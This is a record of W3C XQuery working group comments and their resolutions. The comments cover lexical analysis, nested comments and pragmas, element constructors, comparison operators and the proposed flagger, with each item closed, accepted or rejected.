SECTION A.2.2: Lexical rules Today's lexical analyzer is a 'two-stage' analyzer. The bottom stage, not explicitly mentioned in the Appendix, I will call the raw tokenizer. This stage is responsible for detecting things like NCName and NumericLiteral. The stage above it is responsible for discerning when an NCName is a keyword, and for handling comments, pragmas and must-understand extensions. The design goals that make lexical analysis for XQuery difficult are: no reserved words; nested comments; and the context-sensitivity inherent in supporting direct constructors as a sublanguage with different whitespace and comment rules from the containing language. In a lexical analyzer with reserved words, the keywords can be detected in the raw tokenizer stage. Frequently the raw tokenizer stage also detects and ignores comments. For such a language, a single stage, the raw tokenizer, is sufficient. In languages that only support unnested comments, it is possible to recognize comments as regular expressions. The usual way to recognize regular expressions is with a finite state automaton. XQuery has opted to support nested comments, which means that comments are not a regular expression; instead they constitute a 'context-free' language. The usual way to recognize a context-free language is by adding a stack to a finite state automaton. The current design of the lexical analyzer is with a raw tokenizer that recognizes tokens defined as regular expressions. Since the raw tokenizer is not powerful enough to handle nested comments, comment handling has been pushed into a stage above the raw tokenizer, where there is a stack.
This stage has also been given the responsibility for deciding when an NCName is a keyword. However, these two responsibilities are not easily merged in a single stage. The solution propounded so far has been to prohibit comments in those contexts which are necessary to recognize certain keywords. However, prohibiting comments between certain pairs of keywords is a major usability disservice. I think the solution is that the keyword recognizer needs to be at a higher stage than the comment recognizer. There are two ways to do this: 1. Abandon nested comment support. Most high level languages do not support nested comments, so there is ample precedent. Users are accustomed to this restriction. In addition, if it came to a choice between nested comments, and the freedom to put comments anywhere between keywords, I would gladly sacrifice the nested comments, and I think most users would too. Making this decision would mean that comments would be regular expressions, and could be recognized and removed in the first stage, the raw tokenizer. This decision would also simplify the syntax and analysis of comment-like things (pragmas and must-understand extensions). Overall, the decision would be that there is no nesting of comments, pragmas or must-understand extensions in one another. 2. If you really have to have nested comments, then you should go to a three-stage lexical analyzer. The bottom stage would be a raw tokenizer, which would detect (: (:: :) and ::) as tokens. The second stage above would run the stack to determine the boundaries of comments, pragmas and must-understand extensions. Finally, the top stage would recognize keywords. - Steve B. Had phone call with commenter. I think we should reject the suggestions. ScB: Two suggestions: abandon nested comment support or go to a three-stage analyzer. ScB: I don't think we should abandon nested comment support and the three-stage analyzer is an implementation issue. Proposal: close with no action. Accepted. SECTION 3.7.3.1: Computed element constructors Under "content expression" it says that "a new deep copy of each node is constructed...". "Deep copy" is not defined and there is no hot link to it. The word "copy" does not appear in the data model specification, and in the formal semantics the word is only used regarding environments, not nodes. - Steve B. SECTION 3.2: Path expressions It says in the third paragraph after rule [70] that "Each operation E1/E2 is evaluated as follows: expression E1 is evaluated... The sequence of nodes resulting from all evaluations of E2 are combined, eliminating duplicate nodes based on node identity and sorting the result in document order". Later, in section 3.2.1 "Steps", in the last paragraph prior to the final note, it says "If the axis is a reverse axis, context positions are assigned in reverse document order." These two sentences appear to be in contradiction. Either reverse axes result in a sequence that is in forward document order, or the general statement in 3.2 should say that the result is in either forward or reverse document order. - Steve B. Sorting applied at the end of the step. Text is correct. RESOLVED: No change required. Close issue. SECTION 3.5.1: Value Comparisons Bullet 1 says "Atomization is applied to each operand. If the result, called an atomized operand, does not contain exactly one atomic value, a type error is raised.[err:XP0004][err:XP0006]". The definition of atomization (2.3.2) implies that atomization is done during evaluation phase. 
The words used here "atomic value" also implies that. However, [err:XP0004] is a static type error. Similar statements appear in 3.7.3.1, 3.7.3.2, 3.8.3, and 3.12.3. - Steve B. ++ M.Rys: In certain cases, this error can be detected statically. ++ DECISION: Issue comments/2004Feb/0694 is closed without change to document. Oracle accepts this decision SECTION 3.7.1.1 : Attributes In 3.7.1.1, it states that namespace declaration attributes do not create attribute nodes, and so does 3.7.1.2. However, it is not clear what node namespace declaration attribute creates until 3.7.4 section which states that "A namespace node is created corresponding to each namespace declared in a namespace declaraction attribute...". So a namespace declaraction attribute indeed creates a namespace node. So it would be better if we stated that a namespace declaration attribute creates a namespace node in 3.7.1.1 and 3.7.1.2 or make a cross reference to 3.7.4 . - Steve B. WG Resolution: this has been overtaken by events, as we no longer talk about namespace nodes. SECTION 3.7.3.1: Computed Element Constructors In 3.7.3.1, the content expression of a computed element constructor: the element nodes are given type annotation xs:anyType and attribute nodes are given type annotation xs:anySimpleType. It would be more precise to give type xdt:untypedAtomic to attribute nodes and give type xdt:untypedAny to element node. See previous comments on 3.7.1.3 content for direct element constructor. - Steve B. Changes earlier resolution SECTION 3.7.1.3: Content In 3.7.1.3 Content, 1.d. section, it states that element nodes are given the type annotation xs:anyType and attribute nodes are given the type annotation xs:anySimpleType. It would be more accurate to state that the element nodes are given the type annotation xdt:untypedAny and attribute nodes are given the type annotation xdt:untypedAtomic. ( Please refer to Figure 2: Summary of XQuery Type Hierarchy.) This is because in '3.13 Validate expression' and '3.7.1.5 Type of a constructed element' section, if validate mode = skip, the spec states that element node is given type of 'xdt:untypedAny' and attribute node is given type of 'xdt:untypedAtomic', which appears to be more accurate based on 'Figure 2:Summary of XQuery Type Hierarchy'. So it is better if we make them consistent. However, it seems 1.d. is irrelevant since step 6 performs the same operation. - Steve B. Changes earlier resolution SECTION 3.12.2: Typeswitch Should un-reachable case statements lead to a warning? E.g. case as super-type will make the subsequent case as sub-type unreachable. - Steve B. KK: explains the proposal, it's a request that we should permit a warning if there is dead code. DC: we currently leave warnings entirely up to the implementation. JM: therefore the spec already permits a warning here but does not require it. MK: and I think that's a satisfactory state of affairs. RESOLVED: to close with no action, on the grounds that an implementation is already allowed to raise warnings on this condition. SECTION 3.1.1: How can user defined entities (e.g. those defined in a DTD) be represented in a constructed element? Perhaps a prolog for entity definition? - Steve B. RESOLUTION: Closed with no changes to the document. It should be raised again for V.NEXT. 
SECTION 3.8.3: Order by and Return Clauses In 3.8.3, the XQuery spec says "The return clause of a FLWOR expression is evaluated once for each tuple in the tuple stream, and the results of these evaluations are concatenated to form the result of the FLWOR expression". The usage of the word 'concatenated' is vague here. Since an XQuery result does not support nested sequences, if a tuple contains a sequence, all the items of the sequence become items of the sequence for the return clause of the FLWOR expression. So in this sense, the 'concatenation' here really means "Constructing Sequences" as defined in 3.3.1. We should define this concatenation process to be the same as the construction of sequences specified in 3.3.1. This also implies that an empty sequence in the tuple is dropped, as defined in the construction of sequences. 'Concatenation' does not clarify whether the empty sequence is dropped. - Steve B. JR: is saying that "concatenation" is only unclear if nested sequences exist. JM: doesn't read it that way. AE: was taking this as an editorial comment, that the description of the operation was not clear enough. Asks Don if he's sympathetic. JM: has no objection to it being declared editorial. RESOLVED: to make this an editorial item, Don will consider how to improve the wording. The comment is resolved.

SECTION 2.6.6.1: XQuery flagger To assist the programmer developing a portable application, the flagger should provide a warning of all dependencies on objects that are not fully specified by W3C specifications. Examples of such dependencies are:
- invocation of functions not defined in the fn: namespace
- invocation of functions defined in the fn: namespace that have implementation-defined properties (for example, fn:collection and fn:doc)
- reference to anything added to the static context as an implementation-defined option. See the table in appendix C.1 that documents implementation-defined extensions to the static context.
- Steve B. no more flagger.

SECTION 2.6.6.1: XQuery flagger It should be possible to have a reference implementation of a downloadable application that people could use to check whether a particular XQuery expression is fully portable. Such an application would take as input a character string or file, and return a yes or no verdict about the contents of the character string. The application would not execute the query, merely syntax-check it. - Steve B. flaggers deleted.

SECTION 3.2: Path Expressions In the 3.2 explanation of initial / and //, it states that if the context item is not a node, a type error is raised. It should also state that if the context item is undefined, then a dynamic error is raised (unless this is stated in a general way elsewhere in the document). - Steve B. Section 3.1.4 - "Context item expression" - addresses this issue. Issue closed with no change to documents (joint issue)

SECTION 3.1.2: Variable References At the end of 3.1.2, it says variable binding is defined on top of a concept of "scope". However, there does not seem to be a central place to define the concept of scope in the XQuery spec. Instead, its definition is scattered across each expression that can create a variable binding scope. 3.8, 3.11 and 3.12.2 define the scope of a variable explicitly for FLWOR, Quantified Expr and TypeSwitch respectively; however, the scope of a variable is not defined for function calls.
It would be better if the scope of a variable binding for all kinds of expressions were listed here, with cross-references to each kind of expression, and some examples would help too. - Steve B. RESOLVED: decided to take no action. There was a conscious decision to distribute the definition of variable scope, and people feel it works better that way. A detail: the comment says scope is not defined for function parameters, but it is.

SECTION 3.12.2: Typeswitch fourth para after the BNF begins: ." I can see the SequenceType specified in CaseClause, but the default clause has no syntax to specify a sequence type (and probably should not). My guess is that the type is the most general (item()*). This needs to be clarified. - Steve B. Various people recalled discussing this. DC: it's a duplicate of a comment from David Ezell, 2004Feb1157-01, which we accepted. We have responded to this and implemented it. The resolution was that the static type of the variable in the default clause is that of the expression. RESOLVED: to close this as a duplicate.

SECTION. no flaggers, no must-understands

SECTION D.2: normative references There are normative references for both XML 1.0 and XML 1.1, but when it comes to names, only "Namespaces in XML" is referenced. The latter is a companion to XML 1.0. The correct companion for XML 1.1 is "Namespaces in XML 1.1". - Steve B. The references are all there now.

SECTION A.2.2: lexical rules The KINDTEST, KINDTESTFORPI, CLOSEKINDTEST, OCCURRENCEINDICATOR and SCHEMACONTEXT states do not allow comments, pragmas or must-know extensions. It seems unnecessarily limiting to forbid these within kind tests. - Steve B. Fix will be fallout from qt-2004Feb0658-01 resolution. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01.

SECTION A.2.2: lexical rules DEFAULT state table, fifth row, recognizes <"declare" "variable" "$">, changes state to VARNAME and pushes the DEFAULT state on the stack. In state VARNAME, after passing over comments, pragmas and must-knows, it transitions to the OPERATOR state. The OPERATOR state table only does a popState() for input "}". There are many instances in which a variable name will not be followed by "}". It is not evident that the DEFAULT state pushed on the stack will ever be popped. Stack overflow appears to be a real danger. - Steve B. See [431]. Fixed, as per some other LCCs. [[accepted]]

SECTION A.2.2: lexical rules It is not clear how these rules enforce the whitespace rules /* ws:explicit */ and /* ws:significant */. For example, a direct element constructor has /* ws:explicit */ and begins with "<" QName. In the DEFAULT table, this is found in the row for "<", which performs a transition into state START_TAG while pushing state OPERATOR. It is a requirement not to permit whitespace between "<" and the QName. However, the lexical state tables for the most part assume that whitespace is permitted between two successive tokens. How can the lexical state tables work if some of the transitions permit whitespace between tokens and other transitions do not, and there is no indication in the tables as to which is which? You can't take refuge in the /* ws:explicit */ note attached to the EBNF, because the lexical rules must be executed before the EBNF. - Steve B. Resolution: this issue is closed, with no further changes, and SteveB/Oracle will double check that this is ok.
Resolution: this issue is closed, with no further changes, and SteveB/Oracle will double check that this is ok." Scott Boag noted that (as the agenda shows) this is closed. Steve Buxton confirmed that he has double checked and wants this closed. [Liam notes this was closed at the MIT face-to-face, ] SECTION A.2.2: lexical rules DEFAULT state, on input "(:", has transition to EXPR_COMMENT followed by pushState(). I interpret this to mean the current state is changed from DEFAULT to EXPR-COMMENT, and then the current state (now EXPR_COMMENT) is pushed on top of the stack. We continue executing in EXPR_COMMENT state. On input ":)", the transition is popState(), which seemingly means that the EXPR_COMMENT state that is on the stack is popped and becomes the current state. This looks wrong. Don't we want to go to whatever state we were in before the comment? In that case, shouldn't the transition in DEFAULT state on input "(:" be pushState(DEFAULT) followed by entering EXPR_COMMENT state? Based on this example, I question whether any of the transitions should have pushState() as the second step. It makes more sense to do pushState() before changing the current state rather than after. This whole question of order of actions can be avoided by always pushing an explicit state. Each table knows what state is the current state, so you can just push that state explicitly when you want to push the pre-existing current state. - Steve B. Duplicate of 2004Feb0853. SECTION A.2.1: white space rules If an EBNF rule is marked as /* ws:significant */, it seems that it must apply to all the 'child' EBNF productions. For example, rule [109] ElementContent is marked as /* ws:significant */, which means that all whitespace is significant in ElementContent, and that must mean that all whitespace is significant in anything on the right hand side of rule [109]. But what about EnclosedExpr? Once you go into an enclosed expression, I think that whitespace should be insignificant again. If you say that /* ws:significant */ only pertains to the production on which it appears, and not to any nonterminals found on the right hand side, then I have two questions: 1) How do I know which whitespace is governed by the note, since S almost never appears on the right hand side of these rules; and 2) why is rule [109] labeled this way, since the right hand side consists only of a list of alternative terminals and non-terminals? Similar remarks apply to rule [112] QuotAttrValueContent and rule [113] aposAttrValueContent. - Steve B. SECTION. SECTION A.1: EBNF It seems that whitespace is permitted between a dollar sign and a QName, for example "for $ (: hello world :) prefix:localname" seemingly is permitted, since rule [43] ForClause is not tagged with /* ws: explicit */. However, I have not observed a single instance in the examples of whitespace between a dollar sign and a variable name. Regarding the dollar sign as an operator rather than the first character of a variable name seems to fly in the face of the inevitable user perception that $i is a variable name (rather than $ is an operator and i is the variable name). It might be more intuitive to change rule [20] to Varname ::= '$' QName /* ws: explicit */ and eliminate all the places where '$' appears as an operator sign. - Steve B. Accepted (Scott's rejection of the comment). 
Jim objects to allowing a variable reference such as "$ x" SECTION A.1: EBNF Rule [21] QName is a reference to another recommendation, "Namespaces in XML", which does not have a notion of "ignorable whitespace". Instead, all permissible whitespace is explicitly specified using the S non-terminal. This means that the EBNF conventions in "Namespaces in XML" is subtly different from the EBNF conventions in the present document. An EBNF in XQuery means that whitespace, comments, pragmas and must-understand extensions are permitted between successive items on the right hand side, whereas an EBNF in "Namespaces in XML" does not have that convention. It would be a mistake for a reader of XQuery to follow the link to "Namespaces in XML" and try to apply XQuery's whitespace rules to the rule found at the end of the link. I believe the intention is that XQuery's ignorable whitespace is not permitted on either side of the colon in a QName. Thus "prefix : localname" is not a valid QName for purposes of XQuery, just as it is not permitted in a textual XML document. Also, comments are not permissible on either side of the colon. Perhaps the way to clarify this is to add a /* ws:explicit */ comment to this rule. There may be other rules imported from other recommendations that need attention on this issue as well. - Steve B. See [446]. Excerpt: RESOLUTION: Scott to write a proposal This is the first of a series of whitespace problems that Scott will work on. ACTION: Scott to write proposal to make note about using XQ rules for whitespace when other specs are referenced Proposal accepted. SECTION 4.12: function declaration Rule [120] is marked with /* gn:parens */. Actually, that grammar note does not apply when declaring a function. Following the keywords "declare" "function" there is no doubt that the next QName must be the name of a function. This grammar note applies to function invocations, not declarations. - Steve B. Proposal accepted. SECTION 4.10: xmlspace declaration The keyword "xmlspace" suggests a connection with the xml:space attribute. The user might get the idea that "declare xmlspace preserve" causes an explicit or implicit xml:space='preserve' attribute in every element constructor, and "declare xmlspace strip" causes an explicit or implicit xml:space='default' attribute in every element constructor. I don't think this is your intention; I think you intend that the user must explicitly generate any xml:space attributes, just as the user must explicitly generate any other attributes. Some keyword other than xmlspace would be preferable, perhaps "boundaryspace" or "boundary space". - Steve B. DECIDED qt-2004Feb0642-01 resolved, closed, by renaming xmlspace to boundaryspace. SECTION 3.8: FLWOR expressions Rule [46] WhereClause uses Expr on the right hand side and not ExprSingle. I haven't come up with any examples to show that this is an outright bug, but it looks dangerous to allow a comma operator not surrounded by parentheses in this context. Also, a WhereClause such as "where expr1, expr2" is not intuitive or easy to understand. It is not equivalent to "where expr1 and expr2" and it is not equivalent to "where expr1 or expr2". This is seen from "where 0, 0". The effective boolean value of (0, 0) is true (any sequence of length greater than 1 is true), whereas the effective boolean value of both "0 and 0" and "0 or 0" is false. Note that every other clause of the FLWOR expression is built on ExprSingle. - Steve B. 
DECIDED: to change the parameter for WhereClause to Expr from ExprSingle [Liam note: this resolution may have been incorrectly recorded in the minutes; the joint WGs confirmed at a later meeting that the document is now correct, however]

SECTION 3.7.3.1: computed element constructors Under "content expression", step 4 says that it is an error for two or more attribute nodes to have the same name. Shouldn't there be a similar check in step 3 to ensure that there are no duplicate or conflicting namespace nodes? - Steve B. Already fixed.

SECTION 3.7.2: other direct constructors Rule [18] PITarget is different from XML 1.0 rule [17], which excludes "xml" in any combination of upper and lower case characters. It would be better to simply point to the XML 1.0 definition of this non-terminal. - Steve B. See [445]. RESOLUTION: accepted, refer to production in XML [[accepted]]

SECTION 3.7.2: other direct constructors The XQuery Data Model, section 6.6.3 "Comment information items", says that ." Does this mean that support for direct and computed comment constructors is optional for an XQuery implementation? - Steve B.

SECTION 3.7.2: other direct constructors It says "Each of the above constructors is terminated by the first occurrence of its ending delimiter." Okay, fine. Then: "...the content of an XML comment may not contain the string '-->'". Actually, the restriction in XML 1.0, section 2.5 "Comments", rule [15], is that a comment may not contain "--", and this restriction is reiterated in the XQuery Data Model, section 6.6.1 "overview" (of comment nodes), item 2. Thus "<!-- -- -->" is an illegal comment in XML 1.0. This should be forbidden here as well, since the result cannot be well-formed XML. - Steve B. See [444]. RESOLUTION: partly accepted already, resolving jan0093, but should also be excluded from the BNF. Don and Michael R thought this was already done. [[accepted]]

SECTION 3.7.1.3: content Rule 1)d) says that the type annotation of a copied element node is set to xs:anyType. You don't say what happens to the other PSVI contribution to the element's data model, the nilled property. Is it preserved or set to some fixed value? - Steve B.

SECTION 3.7.1.3: content Rule 1)d), third sentence, says "Copied element nodes are given the type annotation xs:anyType and copied attribute nodes are given the type annotation xs:anySimpleType." Since you are discarding the type information, don't you also have to regenerate the string value of the node, if it has not been preserved? - Steve B.

SECTION 3.7.1.3: content Regarding step 3) in 3.7.1.3 on attribute nodes: at this point in section 3.7.3.1 "Computed element constructors", it talks about the possibility of having namespace nodes at the beginning of the content sequence, whereas this section is simply silent about them. Taken literally, that seems to mean that any namespace nodes left in the content sequence are still present at step 5) and consequently become either "children" or "attributes" of the element. It seems highly likely that you either mean to treat namespace nodes as an error, or else handle them the same as in section 3.7.3.1. - Steve B.

SECTION 3.7.1.3: content Step 2), which raises an error when a document node is found in an enclosed expression in element content, is not user-friendly.
The friendly thing to do would be to strip off the document node and treat it as a sequence of its top-level children. - Steve B. DUPLICATE - closed in today's telcon under +qt-2004Feb0495-01.

SECTION 3.7.1.3: content Rules 1)a) and b) appear to be in the wrong order. If character references are expanded prior to looking for boundary whitespace, then character references for whitespace, such as , are likely to be treated as boundary whitespace and deleted, contrary to the explicit statement in 3.7.1.4 "Whitespace in element content". Implementing this as written will require keeping track of the origin of every whitespace character coming out of step a. - Steve B.

SECTION 3.7.1: direct element constructors Consider the following example: <a>{attribute b {1}}</a> Question: is this acceptable syntax, or is it an error because the }} is interpreted as a literal for a right curly brace? If it is not acceptable, then it would be helpful to say that if the user has an expression requiring two successive }s, then the user should put whitespace between them. If it is acceptable, then you should qualify that }} is interpreted as a literal for a right curly brace unless used in a context where two successive right curly braces would be acceptable. According to the tables in A.2.2, }} is only recognized in state ELEMENT_CONTENT. I simulated the rules in these tables on the example above and found that it is in state OPERATOR when the }} is encountered. The OPERATOR state recognizes } but not }}. My tentative conclusion is that the example is valid and }} can be used to close two expressions, and not always as a literal for a right curly brace. This appears to be the user-friendly answer, but I worry that users will find it hard to know when }} is a literal for a right curly brace and when it is two closing curly braces. One solution would be to do away with }} as a literal for a curly brace. Instead, you might define a character reference. - Steve B. See [443]. RESOLUTION: no action, Oracle accepted it's not needed. [[rejected]]

SECTION 3.5.3: node comparisons Regarding << and >>, I think that these should return true or false only when the comparands are nodes under some common supernode. If x and y are in completely unrelated documents, how can you decide whether x << y or x >> y? I know that the Data Model, section 2.4 "Document order", says that there is an implementation-dependent total ordering of all documents which is stable during the execution of an expression evaluation. An implementation-dependent order does not do the user any good, and making it stable cannot add value in the user's eyes to a feature with no value anyway. This merely burdens implementations with a useless requirement. I think it would be preferable to say that << and >> are partial orders, returning an empty sequence if two nodes have no common supernode. - Steve B. Rejected because (1) path expressions that span documents are not well-defined in the absence of document order, and (2) adopting this proposal would frequently require implementations to determine whether two nodes are in the same document, imposing unnecessary overhead.
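To illustrate the cross-document case discussed in the comment and resolution above, a minimal sketch (the document URIs and element name are invented; assume each document contains at least one section element):

    let $a := (doc("a.xml")//section)[1],
        $b := (doc("b.xml")//section)[1]
    return $a << $b
    (: yields true or false, but which one depends on the
       implementation-dependent ordering between the two documents;
       that ordering is only required to be stable within a single evaluation :)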
SECTION 3.5.2: general comparisons >From the examples, second bullet illustrates that = is not transitive. I think it would also be useful to point out that = and != are not logical negations of each other. For example, (1, 2) = (1, 3) is true (because 1=1), and (1, 2) != (1, 3) is also true (because 2 != 3). In fact, almost all of our accustomed rules about these comparison operators do not hold. Thus (1, 2) > (1, 3) because 2 > 1; (1, 2) < (1, 3) because 1 < 3. In fact, all six relationships are true between (1, 2) and (1, 3). - Steve B. Classified as editorial, and left to editor's discretion. SECTION 3.1.1 : literals There is no description, here or in Appendix A.1, of what is or is not a valid CharRef, merely that it is "an XML-style reference to a Unicode character, identified by its decimal or hexadecimal code point." The use of "XML-style" is unnecessarily vague. The answer is that it depends on whether the implementation is using XML 1.0 or XML 1.1 lexical rules. In either case, it is given by the Well-formedness Constraint: Legal Character" in section 4.1 of either [XML 1.0] or [XML 1.1]. This rule should be cited here. Otherwise it would appear that � conforms to the EBNF for CharRef, and it should not. - Steve B. See [442]. RESOLUTION: Agreed, link directly to the XML Specification, a reference with the discliamer that it could be either 1.0 or 1.1 Closed with editorial change by Don. [[accepted]] SECTION 3.1.1: literals May an implementation define additional PredefinedEntityRefs? For example, could an implementation define € as € ? - Steve B. This was decided to be conformance at meeting 180 Andrew: the document already answers this, the answer to "May an implementation define additional PredefinedEntityRefs?" is yes with a must-understand extension to XQuery. Oracle accepted this. RESOLVED: qt-2004Feb0606-01 closed, no change to the document. SECTION 2.6.6.1: XQuery flagger To assure portability, the flagger must adhere to the XML 1.0 lexical rules, since it is impossible to know whether the platform to be ported to will use XML 1.0 or XML 1.1. Note that Section A.2 "Lexical structure" says that implementations can use either XML 1.0 or XML 1.1 conventions. - Steve B. no more flagger. SECTION 2.6.6.1: XQuery flagger Besides flagging must-understand extensions, the flagger should call out any vendor extensions that are not must-understand extensions. Such extensions are probably inevitable (my prediction is that vendors will find the must-understand extension syntax too lengthy for their favorite extensions). In addition, you have not specified "no supersetting" as was done for Ada. The first sentence of section 2.6.6 "Must-understand extensions" says "an implementation may extend XQuery functionality by supporting must understand extensions." This does not say "an implementation may not extend except through must-understand extensions". Even if you had such a sentence, vendors will still be tempted to add extensions, and you lack the buying power of DoD to enforce a "no supersetting" rule. - Steve B. no more flagger SECTION 2.6.6: must-know extensions Definition, last sentence: A must-understand extension may be used anywhere that ignorable whitespace is allowed." The term "ignorable whitespace" is not defined. 
Section 2.6.5 "Pragmas" has a similar sentence, but at least it is followed immediately by the statement "See A.2 Lexical structure for the exact lexical states where pragmas are recognized" which effectively defines the term for that context, but that sentence limits itself to pragmas and does not apply to must-know extensions. There is a similar sentence in 3.1.6 "Xquery comments", which again is self-limited to just ExprComments. - Steve B. SECTION 2.6.6.1: XQuery flagger Judging from the tables in A.2 "Lexical rules", it is a syntax error to place a comment, pragma or must-understand extension between "for" and "$" when a ForClause is intended. Implementations will want to relax this to be more user-friendly in the case of comments, and they may also wish to define pragmas and must-understand extensions in this position. There are many similar restrictions on the placement of comments, pragmas and must-understand extensions in A.2 which implementations will want to relax. Any user application that avails itself of such a relaxation becomes non-portable. This section already requires the XQuery Flagger to identify the must-understand extensions. The flagger should also point out any violations of the lexical rules of A.2.2, such as more freedom to place comments and pragmas in various places, since such violations will be non-portable. - Steve B. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01. Already Done. Issue closed. StB: This comment goes back to where a comment is allowed. Is a comment allowed between a "for" and the "$" of the variable. I think we decided the answer is yes. So this is a non-issue. Accepted: no specific change here, falls out of resolution for qt-2004Feb0658-01. SECTION 2.6.6.1: XQuery flagger First para, last sentence: "If the XQuery Flagger is enabled, a static error .. is raised if the query contains a must-understand extension." Assuming that a pragma can contain a must-know extension (a possibility raised in another comment), what are the consequences for flagging? Normally an implementation is free to ignore a pragma if it does not support it, so an XQuery expression that contains a pragma that contains a must-understand extension should run on any implementation, and there is no reason to flag it. But this sentence says that it should be flagged. - Steve B. Dependent on qt-2004Feb0598-01, which I trust will be resolved in the negative. Short answer: no Already Done. Issue closed. ScB: Since we don't have nesting, the short answer is no. StB: So a pragma can contain an must-understand extension? ScB: No. A pragma can't contain extensions. StB: But it'll just look like a nested comment, right? ScB: Yes, but this has to do with a pragma containing an extension. In the case of pragmas in extensions, they're not even comments, they're just characters. Basically, this can't happen. Proposal: no. Accepted. SECTION 2.6.6: must-understand extensions Making the pragma lexically an overloading of a comment is a good idea, because an implementation that has no pragmas can simplify their grammar to treat pragmas the same as comments (ie, don't distinguish them as separate lexical categories). The same does not apply to must-understand extensions. An implementation that has no must-understand extensions must still be on the look-out for them, because encountering a must-understand extension when you have none is a syntax error. 
For that reason, it seems like a bad idea to make the syntax for a must-understand extension be an overloading of the comment syntax. This means that a simple implementation with neither pragmas nor must-understand extensions can not treat anything beginning with (: as a comment. Instead it is still burdened with the need to detect "(:: extension" because that is not a comment, it is a must-understand extension (and, for that implementation, a syntax error). Some other way of denoting a must-understand extension would be preferable. Some ideas are MUExtensions ::= "{:" QName ExtensionContents* ":}" MUExtensions ::= "ext" "{" QName ExtensionContents* "}" - Steve B. Proposal: No Change. DC will clarify this as part of his editorial changes. Already Done. Issue closed. StB: Just generally saying that (: and (:: are bound to cause confusion. MH: I think there are items further down that identify a bunch of issues related to this confusion. AE: I don't recall exactly how we came to this syntax. PC: It's a special kind of comment. If you don't understand the pragma, it's just ignored. JR: I think letting them nest and contain comments would make sense. ScB: I think we turn this over to StB/MH, to see if they can get a proposal going in email. MH: It's the nesting that gets confusing. DC: Within a comment, the content is treated just like content. If you put a pragma inside a comment, it wouldn't be recognized as a pragma and ::) would terminate the comment and the rest would be a syntax error. ScB: No, we allow nested comments so it would parse correctly. Two proposals: 1. no nesting comments in pragmas or pragmas in comments. 2. symmetric nesting of comments and pragmas PC: Are both alternatives feasible? ScB: Yes. ScB: We've agreed to not allow extensions in extensions, so I think what we've got now works. Mary's happy, right? MH: Yes, mostly. Propose: resolve without change. Accepted. DC will clarify this as part of his editorial changes. SECTION 2.6.5: pragmas Can a pragma include a must-understand extension? For example, (:: pragma my:pragma (:: extensions my:ext ::) ::) In this example, is "(:: extension my:ext ::)" to be interpreted as a must-understand extension sitting in a place where ignorable whitespace can go, or is it the value of PragmaContents? What are the semantics of this ? - Steve B. Proposal: No. Already Done. Issue closed. ScB: No, the form of a must-understand extension would terminate the pragma. Accepted. SECTION 2.6.5: pragmas Can a Comment be nested in a Pragma? Section 3.1.6 "Xquery comments" says that "Comments may be used anywhere ignorable whitespace is allowed." In the following example: (:: (: comment 1 :) pragma (: comment 2 :) prefix (: comment 3 :) : (: comment 4 :) localname (: comment 5 :) contents (: comment 6 :) more contents (: comment 7 :) ::) which of the comments are acceptable? - Steve B. The answer should no. Neither should comment nesting rules apply. Already Done. Issue closed. ScB: Proposal: no a pragma can't include a comment. Accepted. SECTION 2.6.5: pragmas Rules [1] "Pragma" and [5] "PragmaContents" are ambiguous because they do not exclude the possibility of "::)" being among the PragmaContents* . See the way XML 1.0 rule [15] defines "Comment". Actually, that rule prohibits "--" from being in the body of a Comment, and not merely "-->", perhaps so that you only need one character lookahead to decide if the comment is coming to an end. 
You may want to have a similar rule excluding "::" from the body of a Pragma (or excluding "::)" if you are willing to tolerate two-character look-ahead). Similar remarks apply to rule [2], "MUExtension". As for Rules [3] "ExprComment" and [4] "ExprCommentContent", you want to exclude ":)" from ExprCommentContent. - Steve B. Make it explicit that "(::" etc. have no meaning within pragma's and extensions. "::)" should not be allowed as pragma or extension content. Don objects to this grammar notation on grounds of readability. Applies to many productions including Pragma, MUExtension, Comment, CDataSection, etc. Scott proposes to break each unreadable production into two parts. For example, the Pragma production will include PragmaContent on the RHS, and PragmaContent will be defined separately using a BNF "subtraction" operator with an explanatory note. Issue remains open pending review of a new draft to be prepared by Scott. Already Done. Issue closed. ScB: Proposal: comments and "(::" should have no meaning in the extension or pragma context. You cannot have a comment within a pragma or a pragma within a comment. (A pragma within a comment is just content.) StB: It is legal, but it's just part of the comment? And they have to nest properly. MH: So you can't have a comment within a pragma? ScB: A comment in a pragma is just part of the pragma. Accepted. SECTION 2.6.2: static typing feature Section 3.7.3.1 "Computed element constructors" gives an interesting example of a way to construct an element with the same name as a given element, but with a different content. The note following the example says that the example is not portable because it will not work under the Static Typing Feature. To me, this example calls into question the utility of the feature. The note gives a workaround, using the function fn:exactly-one, and the F&O has additional functions which will overcome certain other static typing issues. The conclusion I draw is that anyone interested in portable programming will be required to use these functions as guards to explicitly disable the static typing feature, in case the application is ported to such an implementation. The purpose of the guard functions is to give the application precisely the behavior it would have had if the static typing feature were not supported. I am wondering if the problem is in an overly fastidious notion of what static typing should do for the user. To me, a function invocation fct(arg) whose sole parameter is declared to be item() or item()+ with an argument arg whose static type is item()? or item()* does not look like a static type error, because it is possible that the command will succeed at run-time. I suggest that the static typing feature should raise type errors when the static type of an actual argument or operand has empty intersection with the required type in that position. In such a case it is a certainty that there would be a run-time error, and therefore a user benefit to provide early detection of such errors. I can see this as a user benefit even if the code is unreachable, because it probably reveals a logic error on the user's part. But to raise static errors for situations that might run successfully on certain inputs seems like a disservice to the user. - Steve B. 49. +qt-2004Feb0593-01 ORA-XQ-092-B: definition of static typing is too rigorous to be useful. SECTION 2.5.2: Handling dynamic errors Third para, second sentence: "For example, an error value might be an integer, a string, a QName, or an element." 
In Functions and Operators section 3 "The error function", second para, third sentence, it says "Each error defined in this document [ie, F&O] is identified by an xs:QName that is in the namespace associated with the xdt: prefix." This seems like a good convention, that all dynamic errors specified by the W3C specification are QNames in a single namespace. It would be good if the rest of the specifications in the XQuery suite adhered to the same convention. This may well be your intent already, in which case the sentence I started with, "For example, an error value might be an integer...", should be construed as referring to values permitted in a user invocation of fn:error. However, in the context in which it appears, it seems to be referring to dynamic errors specified by the XQuery language specification. - Steve B. Closed because the issue is addressed by Andrew's error proposal, which was adopted 4 May.

SECTION 2.6.1: Schema import feature It says: is raised.[err:XQ0012]". This seems to contradict the assertion in Section 2.2.5 "consistency constraints", where it says that "enforcement of these consistency constraints is beyond the scope of this specification". I think that you have it right here in section 2.6.1 and wrong in section 2.2.5. - Steve B. 47. +qt-2004Feb0591-01 ORA-XQ-088-C: enforcement of imported schema consistency.

SECTION 2.2.5: Consistency constraints First para, last sentence: "Enforcement of these consistency constraints is beyond the scope of this specification." I can think of three ways a violation could occur:
